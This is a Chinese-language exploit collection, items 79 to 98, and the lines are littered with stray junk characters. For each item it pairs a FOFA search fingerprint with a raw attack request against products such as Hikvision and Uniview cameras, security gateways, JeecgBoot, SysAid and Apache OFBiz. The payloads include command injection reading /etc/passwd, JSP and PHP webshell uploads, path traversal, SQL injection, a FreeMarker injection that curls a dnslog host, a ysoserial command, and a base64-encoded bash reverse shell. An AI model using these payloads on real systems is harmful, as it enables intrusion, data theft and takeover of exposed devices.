, ] @/ M- ~" N" Q0 D$ P# QHost: x.x.x.x( A, r4 y" I% V
' }( ]+ L! F) m( T8 @: ?3 `( d* S8 B8 r% ]9 b# ?+ g: H8 X
79. BYTEVALUE 百为流控路由器远程命令执行: n- O* C1 P7 v
FOFA:BYTEVALUE 智能流控路由器4 a0 y7 G6 Y& ]
GET /goform/webRead/open/?path=|id HTTP/1.1
8 F5 p) Y$ U3 Q% G: M. h9 XHost:IP2 }2 J7 t7 S5 l+ a( o
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0
* J G0 e8 r% ^- |Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8' l3 s U/ a6 p% t
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
9 O, w/ x/ s" u! h g1 `Accept-Encoding: gzip, deflate
V; P0 Z) o; MConnection: close% w. k+ D( i& H% x- D. w% ]
Upgrade-Insecure-Requests: 1
, q( t1 u& i3 e0 C) m& U' t7 k3 m5 M* \+ X- O& T
9 m7 x' v- M% [( l% K' d3 l/ X6 A6 A80. 速达天耀软件DesignReportSave.jsp接口存在任意文件上传# r7 j. E& A9 T
FOFA:app="速达软件-公司产品"* ^* f# l, u X, v0 _7 e
POST /report/DesignReportSave.jsp?report=../xykqmfxpoas.jsp HTTP/1.1, l3 a; i& k8 A9 o; W2 `
Host: x.x.x.x( j! a* ~& ~# s, N) {
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
9 P7 y# Q S" j7 A9 f5 A0 X( X4 J FContent-Length: 27
6 g" \: s2 k- `4 w" r4 PAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.88 m Q! E, u( ]! x
Accept-Encoding: gzip, deflate# k. A) [! b' ~8 f; {; a, y( h
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2/ l9 J7 R' a X
Connection: close! r8 I( F9 j. v1 f0 m
Content-Type: application/octet-stream
" _8 O! ?( y) g& }Upgrade-Insecure-Requests: 1( x# k; E9 V2 r
0 s; z' a3 A- K3 z/ v<% out.print("oessqeonylzaf");%>
9 u$ E* y2 \! u) h5 O2 z# W1 t. K8 E+ X8 u7 _8 ]$ T
/ X; X4 ~( B- ^& D8 p8 v
GET /xykqmfxpoas.jsp HTTP/1.10 [ l" h8 p4 ?& p( C. A
Host: x.x.x.x6 v2 s" t' s) v, A, G
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.155 R! s! A7 h$ Q) S, l3 @4 P4 k3 i
Connection: close+ t8 T z' B8 U
Accept-Encoding: gzip2 @* s" q( K0 w0 t0 A5 D( @
4 \; z* }3 Y/ J. y% D: N5 n
8 }% N8 w* _7 a* W6 G% _81. 宇视科技视频监控宇视(Uniview)main-cgi密码泄露% o: [; H u* ~1 f
FOFA:app="uniview-视频监控", A. h( T+ @) m5 q! j7 u2 A5 A
GET /cgi-bin/main-cgi?json={"cmd":255,"szUserName":"","u32UserLoginHandle":-1} HTTP/1.14 `& r7 L0 \& k* m
Host: x.x.x.x! m3 ^( N @' H) H/ d
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
( l0 ~0 W# b& @7 U% q% JConnection: close
" `/ Y* ?* e6 qAccept-Encoding: gzip
7 I4 }+ {: |$ r" w6 H+ q+ i7 ?
$ f: o/ S* Q& X2 T6 ^2 ?# K
8 V& ^1 z, j4 q# c0 {5 \, A; H' }82. 思福迪LOGBASE运维安全管理系统 test_qrcode_b 远程命令执行! `7 V, j/ o/ Z: x
FOFA:app="思福迪-LOGBASE"
) U4 o1 b- A4 i* B3 R+ X6 gPOST /bhost/test_qrcode_b HTTP/1.1( Y! B& i# o6 ~# y
Host: BaseURL$ O& P7 a, `/ E' E1 p, T5 K3 n
User-Agent: Go-http-client/1.1/ I: P3 `1 L' X& J5 }% p6 I
Content-Length: 235 P1 t) u8 r) s; A) J7 [ ?! A
Accept-Encoding: gzip, O$ x. J& V7 a a# o
Connection: close2 b) Y \( h5 `+ d
Content-Type: application/x-www-form-urlencoded
7 C+ R' c' E2 b* OReferer: BaseURL* t5 l" U) L+ z; G
+ J; `# n& h8 Q
z1=1&z2="|id;"&z3=bhost
( W* ?1 W2 K5 ^3 ~
3 Y& ~0 D2 N5 j% X; \# d) s1 {8 ?4 E. |' X- S, J
83. JeecgBoot testConnection 远程命令执行
; q4 S; W( D; E% I EFOFA:title=="JeecgBoot 企业级低代码平台"
; m6 l+ h; q/ \( C' y8 y& Z- W3 F) ^
/ d/ n: d2 ^6 _8 x' F$ n
9 f9 Q( `7 R F- V* iPOST /jmreport/testConnection HTTP/1.19 p3 n# h) H, q3 ^0 c
Host: x.x.x.x
4 D% C6 m y* ^4 z4 a/ e, n BUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15! H: L Y/ e1 b9 ]4 S
Connection: close
# n! z4 J3 W: O: l- J- C: Z) aContent-Length: 8881
" a6 @$ N% N* jAccept-Encoding: gzip
% i1 z. b: A, d0 p0 {Cmd: echo "2ZTvHsq4au3uOQ2mK9OuJb86rdO"& f; ]- S; F5 t& ?" Z
Content-Type: application/json [# h5 L4 d/ ]$ H5 H+ h/ D
( r* O, U. m, V- i
PAYLOAD: q2 P9 x6 j4 L2 h+ p, R* E! s
3 n5 V1 t. V" R& q) d84. Jeecg-Boot JimuReport queryFieldBySql 模板注入+ O5 \: Y, K. W5 u, O
FOFA:title=="JeecgBoot 企业级低代码平台"* y3 }! m6 F1 W. y) f
& i, ]) g' o# {: A" }8 ^
/ k5 |+ b& |2 M/ o1 \& Z1 Z7 }& I4 [
POST /jeecg-boot/jmreport/queryFieldBySql HTTP/1.1# P! H* J/ ?2 r- j
Host: 192.168.40.130:8080
+ p- L! P: M9 E; E7 c% KUser-Agent: curl/7.88.1
( B0 f; @& W" [3 a, ]3 S3 Y/ QContent-Length: 156
( v& B9 S( I9 |4 B6 x7 a% \Accept: */*6 U6 ^2 D; q( \! q2 z; W. p
Connection: close
% }$ J# z- h# A/ f: s1 h9 uContent-Type: application/json
4 D Z; ]$ V# N% w `: N6 {3 e$ gAccept-Encoding: gzip
2 `9 z2 g# l) m( q3 w) `- P
& s3 `% \$ l; E{
0 i$ W& a0 S' s "sql": "<#assign ex=\"freemarker.template.utility.Execute\"?new()>${ex(\"curl http://ip.port.kr9dqoau.dnslog.pw/`whoami\")}",& v1 R0 f' Q& z9 s M+ N
"type": "0"
4 |3 ^) O/ w2 i" G- k+ l}
- _. z& \; d S& I' }
" P! ]7 ]6 R" ^9 \( J. G2 t3 I
2 l- k5 V) N" z0 g85. SysAid On-premise< 23.3.36远程代码执行
1 ~# A: v, P3 z. M0 E/ j, kCVE-2023-47246
' @% F. j( _, M8 r' [7 c) m) |3 aFOFA:body="sysaid-logo-dark-green.png" 0 v3 o$ T# P( }& I4 k
EXP数据包如下,注入哥斯拉马
" q, W6 l+ W3 P5 G: P2 i$ PPOST /userentry?accountId=../../../tomcat/webapps&symbolName=LDAP_REFRESH_ HTTP/1.1' g( i5 \/ I7 e- {
Host: x.x.x.x* I( s1 p' t' m9 X, x) X
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15. `- L7 B+ P( {1 k a- {
Content-Type: application/octet-stream9 A1 T. x3 Z, Z
Accept-Encoding: gzip
B: [+ B3 W! P/ s# Q! W4 `, s1 ]* i& N+ j
PAYLOAD' A/ w# `3 f6 |3 j- g
6 {) R: _( k% i# X1 X8 p回显URL:http://x.x.x.x/userfiles/index.jsp5 K4 ~+ K/ Q& M/ L9 j7 g$ d7 c( W
6 F7 b2 ?+ X& ~( c$ k6 l
86. 日本tosei自助洗衣机RCE+ o7 {2 F i* d& ?, q
FOFA:body="tosei_login_check.php"' |9 O* n& s4 _" a0 v- j
POST /cgi-bin/network_test.php HTTP/1.1
! O& C, E$ J' HHost: x.x.x.x e* R0 G; F# [8 N- B9 |
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.363 D. k! g/ b# ~
Connection: close. @8 {7 g# b2 Y
Content-Length: 447 @# a4 }# }- R# u& z
Accept: */*
0 q2 E' Z6 I6 m) z& G' ]( yAccept-Encoding: gzip
d9 ?' j1 J! |% l9 `' ^, Z) cAccept-Language: en
) q7 e' I p$ r7 A; rContent-Type: application/x-www-form-urlencoded( w2 U0 |% W- Q$ o
3 Z) U0 K5 F( x4 e3 I
host=%0acat${IFS}/etc/passwd%0a&command=ping, O5 S0 ^. d* Q* P' O) ?# r
7 d$ u2 H S ?3 G) T8 t, X( |
2 S6 P8 g3 j" l
87. 安恒明御安全网关aaa_local_web_preview文件上传
* U6 X- A, V" H# \9 fFOFA:title="明御安全网关"7 ]8 {+ I( N' {' `
POST /webui/?g=aaa_local_web_preview&name=123&read=0&suffix=/../../../jfhatuwe.php HTTP/1.1
8 F( U# t4 t0 L5 Y; dHost: X.X.X.X) f5 e K9 d9 c$ U" R7 c
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.153 v1 A8 b( V3 {
Connection: close
- u1 ?2 t+ e9 Q7 Y Q5 z9 uContent-Length: 198
7 M$ c, @# i X$ k. Y" R/ X: sAccept-Encoding: gzip
& y/ f* j* |7 s6 \0 S& \* ]6 [Content-Type: multipart/form-data; boundary=qqobiandqgawlxodfiisporjwravxtvd
3 H: L* I, A# x0 I/ |6 v; A2 H7 L* B9 } b/ V
--qqobiandqgawlxodfiisporjwravxtvd
/ b7 g" P4 O7 x% U* SContent-Disposition: form-data; name="123"; filename="9B9Ccd.php"
! _' b* |' m/ _+ Q+ V' UContent-Type: text/plain. E' @/ f* o! g" A+ m8 B
+ W/ i0 x t, T! ~ _! i3 N) c: l- H
2ZqGNnsjzzU2GBBPyd8AIA7QlDq, W0 c, s! c" i- f. e) F
--qqobiandqgawlxodfiisporjwravxtvd--
* D6 g! R: k) l/ @: ~2 A! B2 N5 _
$ ^! x0 O3 ~. u, E1 p8 z. d- t4 G
/ G" W A7 p" a. H. H4 {% A/jfhatuwe.php
* |: S2 r, j' [8 I- Y ^( ^3 X7 k/ P- c& A* t) z9 t, m
88. 安恒明御安全网关 aaa_portal_auth_config_reset 远程命令执行
3 k) X6 a# x, Q9 @/ o0 uFOFA:title="明御安全网关"
$ z7 M9 v5 o5 }GET /webui/?g=aaa_portal_auth_config_reset&type=%0aecho%20%27%3C%3Fphp%20echo%20%22assdwdmpidmsbzoabahpjhnokiduw%22%3B%20phpinfo%28%29%3B%20%3F%3E%27%20%3E%3E%20%2Fusr%2Flocal%2Fwebui%2Ftxzfsrur.php%0a HTTP/1.1
1 Z( @" i4 F" \& V1 Z, f9 L* nHost: x.x.x.xx.x.x.x3 {. }9 V; X& _ ?$ R4 t
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15+ Q. q, V0 U: K. l1 W, G
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.84 I: V" i+ B, M% a
Accept-Encoding: gzip, deflate
$ @) o$ Q5 j- aAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2$ R3 v8 j* Y& q0 ^+ K+ s& }- s$ m
Connection: close5 z2 }* p) z% b* F5 h( Q( K
0 u2 r+ X- E2 o% K# ?
) W% a/ C/ q" E7 ?- n4 U/ R/astdfkhl.php
7 o% K& c$ \0 c
! q+ ]3 B; d$ c89. 致远互联FE协作办公平台editflow_manager存在sql注入5 z- B* p) @; B
FOFA:title="FE协作办公平台" || body="li_plugins_download"7 h; H# I! C( o
POST /sysform/003/editflow_manager.js%70 HTTP/1.1
! J* V: P/ L5 _9 q5 G$ EHost: x.x.x.x/ i: R; V, _ f
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
5 u! P1 n" j6 ]) [( z7 c5 GConnection: close
) m9 @3 A4 S. b ]1 o @9 {Content-Length: 41& l2 y3 y* d& n0 b& Q
Content-Type: application/x-www-form-urlencoded
5 T4 `5 A3 H" C% M& g, uAccept-Encoding: gzip
# A" g) a) g, b3 O7 x
- V( p0 ?# t5 P0 D" [7 loption=2&GUID=-1'+union+select+111*222--+
2 ?8 T6 E! A% ~7 U6 n
6 R. f2 y1 M) \: Z1 j) P
U. Y( P4 I. j0 X0 O. Q) m& i90. 海康威视IP网络对讲广播系统3.0.3_20201113_RELEASE远程命令执行
# J0 b0 u0 n+ M& cFOFA:icon_hash="-1830859634"3 m& H* |/ [) s
POST /php/ping.php HTTP/1.1
* |* s2 c6 P' ~! _) X$ O3 nHost: x.x.x.x
0 t( u: M$ H" }User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0- z, o2 Y+ e2 ?% Z! g- I
Content-Length: 51
/ F7 a2 o5 I: \- U' G+ B" p1 T$ P" XAccept: application/json, text/javascript, */*; q=0.01
4 B, `, i, [& `. U! y( FAccept-Encoding: gzip, deflate
/ R; \3 t1 B S9 X+ xAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
+ f4 b0 Y: i$ \2 z5 kConnection: close
3 X+ V- h* i+ n' HContent-Type: application/x-www-form-urlencoded
; s1 Q0 W2 u1 K. o5 w1 j. gX-Requested-With: XMLHttpRequest$ ?. c! j" D$ h7 u% S/ |1 g& g+ e" e
" h6 g/ }- d9 @. \2 ?/ u' m" J
jsondata%5Btype%5D=99&jsondata%5Bip%5D=ipconfig
3 f) L) S5 |3 Q' F3 q, D- }) \) r# w8 [- O4 _
" A0 O% X" u2 Z( V: S91. 海康威视综合安防管理平台orgManage/v1/orgs/download任意文件读取# a |5 u$ U: q' o0 y# H! B
FOFA:title="综合安防管理平台"
$ @2 _1 `9 V# `GET /center/api/task/..;/orgManage/v1/orgs/download?fileName=../../../../../../../etc/passwd HTTP/1.1% Z0 K! Z( d" x2 {0 a9 O U5 l* b
Host: your-ip
1 Q2 g8 ^8 ^: n9 k+ K7 Q, N- cUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.367 z8 Z6 p J1 ~
Accept-Encoding: gzip, deflate
* X1 ?" N/ g$ r7 b% W) ~, |" u# |Accept: */*7 b, u x5 m e* W/ d" W" x( z
Connection: keep-alive
3 m/ G5 y6 D# J0 E$ d& W0 Z3 L |* W6 b% J# F8 c K
* g( B+ P1 c j: {0 T P
4 j/ k: H) v+ e! b; S" E+ Z
92. 海康威视运行管理中心session命令执行/ j1 D* H% ?$ f1 b
Fastjson命令执行# a% T! [5 t, S$ S
hunter:web.icon=="e05b47d5ce11d2f4182a964255870b76"1 y1 ]5 G) `( g; b( v; \* v. J
POST /center/api/session HTTP/1.1% {( g4 k2 ~8 V( i. m8 J; M! O
Host:
( A5 Z1 `( C" d) _Accept: application/json, text/plain, */*/ [& Y& i9 Z9 h0 U, R- x E( y$ F, V
Accept-Encoding: gzip, deflate2 s7 ]6 D1 \0 _% s/ m
X-Requested-With: XMLHttpRequest
& F% ?, S; Z! x$ W# nContent-Type: application/json;charset=UTF-8& `, D' d% u ~
X-Language-Type: zh_CN
9 g9 J$ A% z* _/ STestcmd: echo test
$ A8 I7 _% Y# `8 n" QUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X -1_0_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
d( F! S* K+ m# E% t1 sAccept-Language: zh-CN,zh;q=0.9
7 H$ Y$ {9 W- q( RContent-Length: 5778
3 _/ n: h5 r0 I! v, Q" e+ M* W" w7 `1 o" Y- Z5 _
PAYLOAD: x/ w! ~) k S r
6 ]+ j2 p/ H' E9 b5 Q& P
: ?) |& f, J" s% V93. 奇安信网神SecGate3600防火墙app_av_import_save任意文件上传) u# n0 q# q3 p# E
FOFA:fid="1Lh1LHi6yfkhiO83I59AYg=="% f, s# v+ @& p! w; K
POST /?g=app_av_import_save HTTP/1.12 \6 H. T) m2 ~& |( U0 h( P9 [* Y
Host: x.x.x.x- d5 T! |- u" U1 b- Z" x- m( f
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarykcbkgdfx) R1 }; R7 U) l* P; h9 V% H
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36- o! Z0 P3 Z! k T+ l1 d
/ M) u, ~% r* @, O0 M/ t) f. ?8 @
------WebKitFormBoundarykcbkgdfx4 L* Q) i1 {; c1 P
Content-Disposition: form-data; name="MAX_FILE_SIZE"8 c1 D; n R, o* s; \
4 u: k4 z. h% _% U
10000000
1 [' m6 \# s0 s, Y8 p: l. z& E------WebKitFormBoundarykcbkgdfx/ M y. Y2 ]; C) P$ L8 q5 b
Content-Disposition: form-data; name="upfile"; filename="xlskxknxa.txt"( s; \ p. n2 ?" T: Q0 G0 w
Content-Type: text/plain
' |* W, x7 N" D" m% g. n: b. `; d) D* O' |
wagletqrkwrddkthtulxsqrphulnknxa: [4 z; K& n! Z- v$ l
------WebKitFormBoundarykcbkgdfx2 S0 e% \7 a$ f4 R
Content-Disposition: form-data; name="submit_post"
7 M8 C/ \. H! |/ x
" h# a0 a/ I5 U' T& h* E( dobj_app_upfile( ^1 U8 y% x6 t3 u9 @1 m$ p# b
------WebKitFormBoundarykcbkgdfx
$ j0 U9 m* a+ a( Z* DContent-Disposition: form-data; name="__hash__"% d) {' q7 f R M& y) ^
) s' h9 }. I3 a6 n0b9d6b1ab7479ab69d9f71b05e0e9445
+ H0 x- c/ n$ g" U# M0 ^! S6 v% p* D% a1 i------WebKitFormBoundarykcbkgdfx--
8 ^( C! L5 C3 T6 h0 K" r7 Q- N' c9 x2 N
* b/ G" V5 Q/ Z3 Y: V
GET /attachements/xlskxknxa.txt HTTP/1.17 P2 s' p/ n; A& u& ?
Host: xx.xx.xx.xx
' h# B" U0 n2 ?1 ~4 P. iUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
4 _7 g7 a# D# X1 @! F
* @6 n9 M. v, @( z# A8 F5 M4 Y | t- `9 B
94. 奇安信网神SecGate3600防火墙obj_area_import_save任意文件上传5 L3 ^! u1 V# y0 \& X- p
FOFA:fid="1Lh1LHi6yfkhiO83I59AYg=="2 t4 ]& C# c. ^! J
POST /?g=obj_area_import_save HTTP/1.1- d% [: b; p2 E& \# e5 \% N9 o N
Host: x.x.x.x
, g M$ l9 T* E, }4 zContent-Type: multipart/form-data; boundary=----WebKitFormBoundarybqvzqvmt, g1 ?' U. w; r8 f! X5 l3 K5 j+ M
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
9 t/ H' b* ^2 u6 a x7 e7 G
# ~8 J0 X# F Z: T3 j------WebKitFormBoundarybqvzqvmt% t" h/ ^4 A- E! y# L% `8 u4 C
Content-Disposition: form-data; name="MAX_FILE_SIZE"
5 f: \9 y# }( d$ f: ^# F. ?- g. o8 ]6 q9 `- O" l
10000000
7 F' x5 s4 _2 D" J ~- P( A, ^8 j------WebKitFormBoundarybqvzqvmt \3 C; s# f$ v+ u5 X) h5 p2 _6 \+ U
Content-Disposition: form-data; name="upfile"; filename="cciytdzu.txt"/ @2 I) Q7 c5 ]( A$ j, q ?4 K
Content-Type: text/plain9 l( s, M- y E4 `; ?
3 T1 j* M% V& n0 G. P* { V& V5 ?
pxplitttsrjnyoafavcajwkvhxindhmu6 u% m3 a: ]/ Q
------WebKitFormBoundarybqvzqvmt0 G* X7 r4 {8 z3 n1 z
Content-Disposition: form-data; name="submit_post"
7 Q# h, x+ ]( v! Y/ u6 s' n8 S) A; ]4 m. D" [" W
obj_app_upfile1 i8 f3 l1 ^- \1 j( D5 v# c
------WebKitFormBoundarybqvzqvmt6 Z* {" q. P2 [3 y! _
Content-Disposition: form-data; name="__hash__") m& E4 m- a) T( Z. y
; T; d3 s' j: z0b9d6b1ab7479ab69d9f71b05e0e9445* a8 l# A. y+ S
------WebKitFormBoundarybqvzqvmt--0 J5 ^ k0 h* M' I1 F1 b* l Z3 v2 T& N; D
1 G5 C7 W$ T$ u- T5 M! a: E3 A: [. |4 |
) X; c% K% z# m1 X
% E" {4 C8 p+ H( P* t, Z" s0 _GET /attachements/xlskxknxa.txt HTTP/1.1
; D0 C# `5 A1 t! q8 y9 h& ], ^Host: xx.xx.xx.xx
: Q0 n$ ?: z5 m/ u# {User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.361 O+ e& j% M3 n
, C9 ~2 \$ n/ u! ]% M1 w' \# ^3 ?' i! n
' a- W/ y; L6 v5 `8 o& M0 p0 I5 N( A
95. Apache-OFBiz < 18.12.10 xmlrpc远程代码执行
4 Y7 f- T" b1 z: g2 @- sCVE-2023-49070% K* y+ d7 c8 Y# y7 M% {
FOFA:app="Apache_OFBiz"
% H x( k, N: W) \3 D ]POST /webtools/control/xmlrpc;/?USERNAME&PASSWORD=s&requirePasswordChange=Y HTTP/1.11 F9 \! K) n& a9 }$ R4 N2 @, U
Host: x.x.x.x# V/ `1 U) J q; q1 }( e
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.366 e, N, O7 b9 l( w& Z
Connection: close
! \3 A+ U ^8 g$ e3 M o, PContent-Length: 8891 X5 g. `* d! B, }; A& ]( M
Content-Type: application/xml" M: w! J/ p2 X S4 G5 i
Accept-Encoding: gzip5 V4 t' K( @6 t5 @2 A6 l. U; v
' P* s- G/ x5 C: s
<?xml version="1.0"?>) {2 n8 P, `% c! L+ Q! w
<methodCall>
& `3 G; y& d/ o. `" Y1 C. g <methodName>2a4UTp2XBzXgziEO3BIFOCbJiI3</methodName>
* O2 c% O- ^4 f0 F <params>
4 H5 m& z9 F6 [ <param>) D, B: S. K7 v) o, L% `' O
<value>2 d7 `% z- \5 {) R
<struct>
" n5 q8 O8 _" ?+ J3 M( D3 @ <member>
- j. z. e+ q% U+ W7 R D \ <name>test</name>
* U7 E7 r6 u% }: b E <value>
6 s: r/ O: C+ L g <serializable xmlns="http://ws.apache.org/xmlrpc/namespaces/extensions">[payload的base64值]</serializable># a- o y& D/ C8 O9 a9 C* V" \
</value>
8 ]5 _1 P a4 ] ^8 [! z </member>
V5 [$ G! x2 I' D& J </struct>' d& H2 }2 {' v- h3 ?8 _, T' j
</value>
& o1 T) T, f f6 f# K6 q </param>
7 {* \$ H. v$ j' ~ </params>- c l$ i0 [- ~! i- G
</methodCall>7 P" ]6 C5 v0 J
' W! F% v) i! |6 @& I
* l6 U5 }2 h+ H% ?9 c
用ysoserial生成payload8 s [* G2 A' p/ r' E
java -jar ysoserial-all.jar CommonsBeanutils1 "ping 41e87zy3.dnslog.pw" | base64 | tr -d "\n"9 ?0 k# ?3 e, P3 @
: j. @8 u' W/ B7 D
3 A/ D; s0 q1 O$ U# ?& @+ C4 I4 }将生成的payload替换到上面的POC
0 d P5 v4 U! q# s! Z3 I& u( @2 QPOST /webtools/control/xmlrpc;/?USERNAME&PASSWORD=s&requirePasswordChange=Y HTTP/1.1. T# q+ Q9 p" Y! R3 j* q
Host: 192.168.40.130:8443
' ]/ S7 ]' T4 Z9 A4 d/ gUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
$ o4 Z5 x( x% C: R6 Q; j# |$ V4 GConnection: close5 S7 H; i# d/ [0 u0 O
Content-Length: 889
4 r3 A* M* w! `0 d! \" g$ LContent-Type: application/xml1 P7 w1 Y) _1 e" L8 M
Accept-Encoding: gzip. z3 q# I7 q% @4 @/ x D/ ~
' r; ^6 l6 y* Y- |* {PAYLOAD6 L9 y" l. E( [ L
# P8 w6 a$ q4 p7 j9 `96. Apache OFBiz 18.12.11 groovy 远程代码执行
: @* c6 d! g* @5 L$ w3 L+ O# gFOFA:app="Apache_OFBiz"5 Z# s% p) @1 E9 n3 a
POST /webtools/control/ProgramExport/?USERNAME=&PASSWORD=&requirePasswordChange=Y HTTP/1.1
7 k5 g9 @7 i, |5 t* ~1 DHost: localhost:8443
' {3 S5 E, e4 q6 D! D! FUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
% ~/ M9 j, { P$ J* M! vAccept: */*
\$ a' d& Y# ?! K2 x7 `" mAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
: o8 [. H M$ v F$ ~Content-Type: application/x-www-form-urlencoded$ ]+ K# h9 V' t3 s4 C
Content-Length: 55/ z) D' B2 B# z/ f
* q% i' k) c7 |. K( m) hgroovyProgram=throw+new+Exception('id'.execute().text);% P# \, q k( y! U
( V) g* e9 j+ v! L _
, U) L/ d2 j$ K反弹shell8 {: t3 N) B$ W: _, Y2 ~1 Y. b
在kali上启动一个监听! ?6 [/ o4 [% b$ K8 V5 @/ L* k
nc -lvp 7777
6 o: s# G) N# j2 ?% T8 S, ~; s/ n8 v3 d- E3 ]
POST /webtools/control/ProgramExport/?USERNAME=&PASSWORD=&requirePasswordChange=Y HTTP/1.12 t6 t( V# \5 m( G* d9 ]3 x% T$ Z: ]
Host: 192.168.40.130:8443
/ p$ R' j' o2 Z9 i0 x) eUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
4 _/ K$ t8 M6 U8 M" V: eAccept: */*
6 C9 D ^6 q, ^' n4 }7 U) E& SAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2. U. w+ X- R& Z6 n) G% u
Content-Type: application/x-www-form-urlencoded
# V- p5 `5 {0 Q& m% UContent-Length: 71
, N8 j* S3 t0 {7 b
) B! S, q9 e) }groovyProgram='bash+-c+{echo,YmFzaCUyMC1pJTIwPiYlMjAvZGV2L3RjcC8xOTIuMTY4LjQwLjEyOC83Nzc3JTIwMD4mMQ==}|{base64,-d}|{bash,-i}'.execute();, O+ w; U+ `# f% g0 O
0 `, n& y1 l- u% }+ \9 T97. OneBlog v2.2.2 博客Shiro反序列化远程命令执行
5 R* [. k1 z$ w* ?% f" T+ {+ fFOFA:body="/assets/js/zhyd.tool.js" || body="OneBlog,开源博客"
9 Z: u, T2 `. p5 a7 e4 ]) AGET /passport/login/ HTTP/1.14 A; W/ o0 P: i& M1 i
Host: 192.168.40.130:8085) l+ m) X1 G$ h& T
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
4 n7 d# O! B5 d+ k3 i" o( KAccept-Encoding: gzip5 F# G! s/ i- r2 W4 [! i
Connection: close0 Y/ {+ X: E' l) e) P' I$ K
Cookie: rememberMe=PAYLOAD) I. ~6 L% P& D' i/ L4 x
X-Token-Data: echo "2a4MU6FVYI3qR4AWxn1Bdfh6Ttk") m7 Z4 ]& \% C! q4 {
; O" n; F: n* W0 |3 k0 C4 W, V" `2 O) z. Q& o; E3 a& o' J2 @
98. SpiderFlow爬虫平台远程命令执行5 p0 }+ I, X/ n; j" D8 ?
CVE-2024-0195# |4 q' G( t" T8 R
FOFA:app="SpiderFlow"
# W1 U6 }3 U; V# ]! g2 s' aPOST /function/save HTTP/1.1
6 [1 F6 _* w+ m9 k& ^/ k( W3 ^Host: 192.168.40.130:8088
& ?4 r; j, C S' k: k9 T6 z# _7 PUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
2 o* ^. K" `/ l- H4 {Connection: close6 z; c9 T0 @1 ?, v
Content-Length: 1211 \0 Z) @: B( c
Accept: */*# S1 ?5 v3 {& i9 X: R$ r
Accept-Encoding: gzip, deflate2 Y% l$ z: v: {7 z2 f( q0 G
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
6 @& g) U) Z2 D0 qContent-Type: application/x-www-form-urlencoded; charset=UTF-8
1 p. D8 W; s+ C9 q' r$ v8 B# bX-Requested-With: XMLHttpRequest
! P r6 o4 c/ X' h) q3 V9 a( O5 p( u/ G: R: O, ]- Y' |- |
